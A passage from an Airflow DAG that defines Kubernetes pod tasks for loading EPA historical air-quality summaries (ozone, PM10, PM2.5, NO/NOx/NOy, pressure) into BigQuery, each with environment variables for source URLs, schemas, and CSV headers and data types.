"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.nonoxnoy_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - nonoxnoy_hourly",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
ozone_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="ozone_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.ozone_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - ozone_daily_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
ozone_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="ozone_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.ozone_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - ozone_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm10_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm10_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm10_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm10_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm10_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm10_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm10_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm10_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_frm_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_frm_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_frm_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_frm_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_nonfrm_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_nonfrm_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.source_url }}",
"START_YEAR": "1980",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_nonfrm_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_nonfrm_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_nonfrm_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_nonfrm_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_nonfrm_hourly_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_speciation_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_speciation_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_speciation_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_speciation_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pm25_speciation_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pm25_speciation_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pm25_speciation_hourly_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pm25_speciation_hourly_summary",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "date_local": "datetime64[ns]",\n "time_local": "str", "date_gmt": "datetime64[ns]", "time_gmt": "str", "sample_measurement": "float64", "units_of_measure": "str",\n "mdl": "float64", "uncertainty": "float64", "qualifier": "str", "method_type": "str", "method_code": "int32", "method_name": "str",\n "state_name": "str", "county_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "date_local",\n "time_local", "date_gmt", "time_gmt", "sample_measurement", "units_of_measure",\n "mdl", "uncertainty", "qualifier", "method_type", "method_code", "method_name",\n "state_name", "county_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pressure_daily_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pressure_daily_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
"PROJECT_ID": "{{ var.value.gcp_project }}",
"DATASET_ID": "{{ var.json.epa_historical_air_quality.dataset_id }}",
"TABLE_ID": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.table_id }}",
"YEAR_FIELD_NAME": "date_local",
"YEAR_FIELD_TYPE": "DATETIME",
"SCHEMA_PATH": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.schema_path }}",
"CHUNKSIZE": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.chunk_size }}",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "{{ var.json.epa_historical_air_quality.pressure_daily_summary.target_gcs_path }}",
"PIPELINE_NAME": "epa_historical_air_quality - pressure_daily_summaries",
"INPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
"DATA_DTYPES": '{ "state_code": "str", "county_code": "str", "site_num": "str", "parameter_code": "int32", "poc": "int32",\n "latitude": "float64", "longitude": "float64", "datum": "str", "parameter_name": "str", "sample_duration": "str",\n "pollutant_standard": "str", "date_local": "datetime64[ns]", "units_of_measure": "str", "event_type": "str", "observation_count": "int32",\n "observation_percent": "float64", "arithmetic_mean": "float64", "first_max_value": "float64", "first_max_hour": "int32", "aqi": "str",\n "method_code": "str", "method_name": "str", "local_site_name": "str", "address": "str", "state_name": "str",\n "county_name": "str", "city_name": "str", "cbsa_name": "str", "date_of_last_change": "datetime64[ns]" }',
"OUTPUT_CSV_HEADERS": '[ "state_code", "county_code", "site_num", "parameter_code", "poc",\n "latitude", "longitude", "datum", "parameter_name", "sample_duration",\n "pollutant_standard", "date_local", "units_of_measure", "event_type", "observation_count",\n "observation_percent", "arithmetic_mean", "first_max_value", "first_max_hour", "aqi",\n "method_code", "method_name", "local_site_name", "address", "state_name",\n "county_name", "city_name", "cbsa_name", "date_of_last_change" ]',
},
resources={"request_ephemeral_storage": "16G", "request_cpu": "1"},
)
# Run CSV transform within kubernetes pod
pressure_hourly_summary = kubernetes_engine.GKEStartPodOperator(
task_id="pressure_hourly_summary",
startup_timeout_seconds=600,
name="load_data",
namespace="default",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="epa-hist-air-quality",
image_pull_policy="Always",
image="{{ var.json.epa_historical_air_quality.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "{{ var.json.epa_historical_air_quality.pressure_hourly_summary.source_url }}",
"START_YEAR": "1990",
"SOURCE_FILE": "files/data.csv",
